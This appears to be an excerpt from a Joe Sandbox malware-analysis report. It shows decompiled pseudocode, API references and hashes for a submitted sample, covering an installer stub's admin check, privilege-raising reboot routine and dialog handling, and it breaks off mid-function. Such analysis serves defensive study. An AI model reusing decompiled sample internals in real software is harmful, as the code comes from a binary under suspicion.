                                                                                                                                                                                                        0x00a95efc
                                                                                                                                                                                                        0x00a95ef7
                                                                                                                                                                                                        0x00a95ef2
                                                                                                                                                                                                        0x00a95f4c
                                                                                                                                                                                                        0x00a95f4e
                                                                                                                                                                                                        0x00a95f50
                                                                                                                                                                                                        0x00a95f54
                                                                                                                                                                                                        0x00a95ed4
                                                                                                                                                                                                        0x00a95ea2
                                                                                                                                                                                                        0x00a95ea4
                                                                                                                                                                                                        0x00a95eaf
                                                                                                                                                                                                        0x00a95eaf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95e79
                                                                                                                                                                                                        0x00a95e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95e83
                                                                                                                                                                                                        0x00a95e83
                                                                                                                                                                                                        0x00a95e83
                                                                                                                                                                                                        0x00a95e85
                                                                                                                                                                                                        0x00a95e85
                                                                                                                                                                                                        0x00a95e8e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95e94
                                                                                                                                                                                                        0x00a95e8e
                                                                                                                                                                                                        0x00a95e7d
                                                                                                                                                                                                        0x00a95e77
                                                                                                                                                                                                        0x00a95e6e
                                                                                                                                                                                                        0x00a95e65
                                                                                                                                                                                                        0x00a95e5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95dd0
                                                                                                                                                                                                        0x00a95dd0
                                                                                                                                                                                                        0x00a95dd0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95dd0
                                                                                                                                                                                                        0x00a95dce
                                                                                                                                                                                                        0x00a95dca
                                                                                                                                                                                                        0x00a95dba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d00
                                                                                                                                                                                                        0x00a95dd9
                                                                                                                                                                                                        0x00a95e04
                                                                                                                                                                                                        0x00a961fe
                                                                                                                                                                                                        0x00a95e0a
                                                                                                                                                                                                        0x00a95e0c
                                                                                                                                                                                                        0x00a95e17
                                                                                                                                                                                                        0x00a95e17
                                                                                                                                                                                                        0x00a95e04
                                                                                                                                                                                                        0x00a96200
                                                                                                                                                                                                        0x00a96200
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00A95CEE
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00A98B3E,00000104,00000000,?,?), ref: 00A95DFC
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00A95E3E
                                                                                                                                                                                                        • CharUpperA.USER32(-00000052), ref: 00A95EE1
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A95F6F
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00A95FA7
                                                                                                                                                                                                        • CharUpperA.USER32(-0000004E), ref: 00A96008
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00A960AA
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00A91140,00000000,00000040,00000000), ref: 00A961F1
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00A961F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
                                                                                                                                                                                                        • API String ID: 1203814774-25366791
                                                                                                                                                                                                        • Opcode ID: 4dbffb484b6985c8a352d80b7b7984f6c123dd6e2446ec0f8cc8809181cc327e
                                                                                                                                                                                                        • Instruction ID: f7922b3a788ad95304af57be01573b8661f0a84be441bd351db615a2bd9b8b96
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4dbffb484b6985c8a352d80b7b7984f6c123dd6e2446ec0f8cc8809181cc327e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BD14471F04A545ADF3BCB7C8C8A7FA3BF1AB16340F1441ABC586CA590DA758E878B40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A918A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E00A918A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0xa98004; // 0x6298f871
				_v8 = _t23 ^ _t53;
				_t25 =  *0xa98128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00A96CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E00A917EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0xa98128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0xa98128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}


















                                                                                                                                                                                                        0x00a918a3
                                                                                                                                                                                                        0x00a918a3
                                                                                                                                                                                                        0x00a918ab
                                                                                                                                                                                                        0x00a918b2
                                                                                                                                                                                                        0x00a918b5
                                                                                                                                                                                                        0x00a918be
                                                                                                                                                                                                        0x00a918c0
                                                                                                                                                                                                        0x00a918c6
                                                                                                                                                                                                        0x00a918c7
                                                                                                                                                                                                        0x00a918ca
                                                                                                                                                                                                        0x00a918cf
                                                                                                                                                                                                        0x00a919c9
                                                                                                                                                                                                        0x00a919d8
                                                                                                                                                                                                        0x00a919d8
                                                                                                                                                                                                        0x00a918df
                                                                                                                                                                                                        0x00a919b8
                                                                                                                                                                                                        0x00a919bd
                                                                                                                                                                                                        0x00a919bf
                                                                                                                                                                                                        0x00a919bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a919bd
                                                                                                                                                                                                        0x00a918fa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91912
                                                                                                                                                                                                        0x00a919aa
                                                                                                                                                                                                        0x00a919ad
                                                                                                                                                                                                        0x00a919b3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91927
                                                                                                                                                                                                        0x00a91927
                                                                                                                                                                                                        0x00a91932
                                                                                                                                                                                                        0x00a91936
                                                                                                                                                                                                        0x00a919a9
                                                                                                                                                                                                        0x00a919a9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a919a9
                                                                                                                                                                                                        0x00a9194c
                                                                                                                                                                                                        0x00a919a2
                                                                                                                                                                                                        0x00a919a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9196e
                                                                                                                                                                                                        0x00a91970
                                                                                                                                                                                                        0x00a91999
                                                                                                                                                                                                        0x00a9199c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9199c
                                                                                                                                                                                                        0x00a91972
                                                                                                                                                                                                        0x00a91972
                                                                                                                                                                                                        0x00a91975
                                                                                                                                                                                                        0x00a91984
                                                                                                                                                                                                        0x00a91985
                                                                                                                                                                                                        0x00a9198a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9198c
                                                                                                                                                                                                        0x00a91991
                                                                                                                                                                                                        0x00a91996
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91996
                                                                                                                                                                                                        0x00a9194c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A917EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A918DD), ref: 00A9181A
                                                                                                                                                                                                          • Part of subcall function 00A917EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A9182C
                                                                                                                                                                                                          • Part of subcall function 00A917EE: AllocateAndInitializeSid.ADVAPI32(00A918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A918DD), ref: 00A91855
                                                                                                                                                                                                          • Part of subcall function 00A917EE: FreeSid.ADVAPI32(?,?,?,?,00A918DD), ref: 00A91883
                                                                                                                                                                                                          • Part of subcall function 00A917EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A918DD), ref: 00A9188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A918EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00A918F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A9190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00A91918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A9192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A91944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A91964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00A9197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00A9199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00A919A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00A919AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        • Opcode ID: 38aa62599c6a1f8c65d8271dbeea4eed88ae99aac69008de578fc7cef5e29761
                                                                                                                                                                                                        • Instruction ID: f9b4b0c39964eebdc3d24acee4c3d5c2fe6d4e43f2001de64ff82bce7814fa2f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38aa62599c6a1f8c65d8271dbeea4eed88ae99aac69008de578fc7cef5e29761
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3311871B0020AABDF20DFE5DC98AAFBBF8FF15700F20042AE545D2160DB359906CB61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A91F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E00A91F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0xa99a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0xa98004; // 0x6298f871
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E00A944B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00A96CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E00A944B9(0, 0x522, 0xa91140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00A91EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

















                                                                                                                                                                                                        0x00a91f90
                                                                                                                                                                                                        0x00a91f90
                                                                                                                                                                                                        0x00a91f93
                                                                                                                                                                                                        0x00a91f98
                                                                                                                                                                                                        0x00a91fa4
                                                                                                                                                                                                        0x00a91fa7
                                                                                                                                                                                                        0x00a91fc5
                                                                                                                                                                                                        0x00a91fcd
                                                                                                                                                                                                        0x00a91fdb
                                                                                                                                                                                                        0x00a91ee5
                                                                                                                                                                                                        0x00a91eea
                                                                                                                                                                                                        0x00a91ef1
                                                                                                                                                                                                        0x00a91ef4
                                                                                                                                                                                                        0x00a91f0c
                                                                                                                                                                                                        0x00a91f2e
                                                                                                                                                                                                        0x00a91f3a
                                                                                                                                                                                                        0x00a91f46
                                                                                                                                                                                                        0x00a91f4d
                                                                                                                                                                                                        0x00a91f58
                                                                                                                                                                                                        0x00a91f60
                                                                                                                                                                                                        0x00a91f61
                                                                                                                                                                                                        0x00a91f62
                                                                                                                                                                                                        0x00a91f75
                                                                                                                                                                                                        0x00a91f80
                                                                                                                                                                                                        0x00a91f77
                                                                                                                                                                                                        0x00a91f77
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91f77
                                                                                                                                                                                                        0x00a91f64
                                                                                                                                                                                                        0x00a91f64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91f64
                                                                                                                                                                                                        0x00a91f0e
                                                                                                                                                                                                        0x00a91f0e
                                                                                                                                                                                                        0x00a91f13
                                                                                                                                                                                                        0x00a91f13
                                                                                                                                                                                                        0x00a91f14
                                                                                                                                                                                                        0x00a91f14
                                                                                                                                                                                                        0x00a91f16
                                                                                                                                                                                                        0x00a91f17
                                                                                                                                                                                                        0x00a91f1a
                                                                                                                                                                                                        0x00a91f1f
                                                                                                                                                                                                        0x00a91f1f
                                                                                                                                                                                                        0x00a91f86
                                                                                                                                                                                                        0x00a91f8f
                                                                                                                                                                                                        0x00a91fcf
                                                                                                                                                                                                        0x00a91fd3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91fd3
                                                                                                                                                                                                        0x00a91fa9
                                                                                                                                                                                                        0x00a91fb4
                                                                                                                                                                                                        0x00a91fbb
                                                                                                                                                                                                        0x00a91fc3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91fc3
                                                                                                                                                                                                        0x00a91f9a
                                                                                                                                                                                                        0x00a91f9a
                                                                                                                                                                                                        0x00a91fa2
                                                                                                                                                                                                        0x00a91fd9
                                                                                                                                                                                                        0x00a91fda
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91fa2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A91EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00A91F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00A91FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: 5e7df0855c596bc1c9276fbc3f363a7c66aff43c422cd86c642d97c5a62cf4dc
                                                                                                                                                                                                        • Instruction ID: a646123a72f2c8813302b191a3cbeefe0e6da557f742a3dc99556efa5e8f2452
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e7df0855c596bc1c9276fbc3f363a7c66aff43c422cd86c642d97c5a62cf4dc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0521B771B4020A7BDF209BE59C4AFBF76F8EB95B50F20051FFA02D6181DB758802D6A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A97155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A97155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0xa98004; // 0x6298f871
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0xa98004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0xa98004 = _t39;
				}
				_t37 =  !_t36;
				 *0xa98008 = _t37;
				return _t37;
			}











                                                                                                                                                                                                        0x00a9715d
                                                                                                                                                                                                        0x00a97161
                                                                                                                                                                                                        0x00a97165
                                                                                                                                                                                                        0x00a97178
                                                                                                                                                                                                        0x00a97182
                                                                                                                                                                                                        0x00a9718e
                                                                                                                                                                                                        0x00a97197
                                                                                                                                                                                                        0x00a971a0
                                                                                                                                                                                                        0x00a971b1
                                                                                                                                                                                                        0x00a971b8
                                                                                                                                                                                                        0x00a971c4
                                                                                                                                                                                                        0x00a971c7
                                                                                                                                                                                                        0x00a971cb
                                                                                                                                                                                                        0x00a971d5
                                                                                                                                                                                                        0x00a971da
                                                                                                                                                                                                        0x00a971da
                                                                                                                                                                                                        0x00a971dc
                                                                                                                                                                                                        0x00a971dc
                                                                                                                                                                                                        0x00a971e2
                                                                                                                                                                                                        0x00a971e5
                                                                                                                                                                                                        0x00a971ee

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A97182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00A97191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00A9719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00A971A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00A971B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: 86ad4832ba5cf7aa719bfd1f16ea2774eba14b4f63d3dfe5fa5624dd8438d014
                                                                                                                                                                                                        • Instruction ID: 345ffb8053f74a794aa4547418fbdcadd40a05daa9d3b83ef322a0290faf71ae
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86ad4832ba5cf7aa719bfd1f16ea2774eba14b4f63d3dfe5fa5624dd8438d014
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52113A71E11208DBCF10DFF8DA48A9EB7F4EF18314F614A57D806E7220EA349A05CB51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A96CF0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A96CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



                                                                                                                                                                                                        0x00a96cf7
                                                                                                                                                                                                        0x00a96d00
                                                                                                                                                                                                        0x00a96d19

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A96E26,00A91000), ref: 00A96CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00A96E26,?,00A96E26,00A91000), ref: 00A96D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00A96E26,00A91000), ref: 00A96D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00A96E26,00A91000), ref: 00A96D12
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3231755760-0
                                                                                                                                                                                                        • Opcode ID: c9a1db699e53e79112050d3aeb33010d7d6a4e29ba8c2a4d9c869ff50931e1a4
                                                                                                                                                                                                        • Instruction ID: a448a85249839b5dfdc511bdbfe7d04634735f13f4465ab32bc9e18ac77d6685
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9a1db699e53e79112050d3aeb33010d7d6a4e29ba8c2a4d9c869ff50931e1a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0CD0C932200108BBDB006BE1EC0CA593F28EB98212F644103F31986030CE3244528B92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A93210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E00A93210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E00A943D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "photo660");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0xa99a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa991e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E00A944B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0xa991e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0xa991e5 - 3;
						if(_t49 - 0xa991e5 < 3) {
							goto L32;
						}
						_t24 =  *0xa991e5; // 0x3a
						__eflags = _t24 - 0x3a;
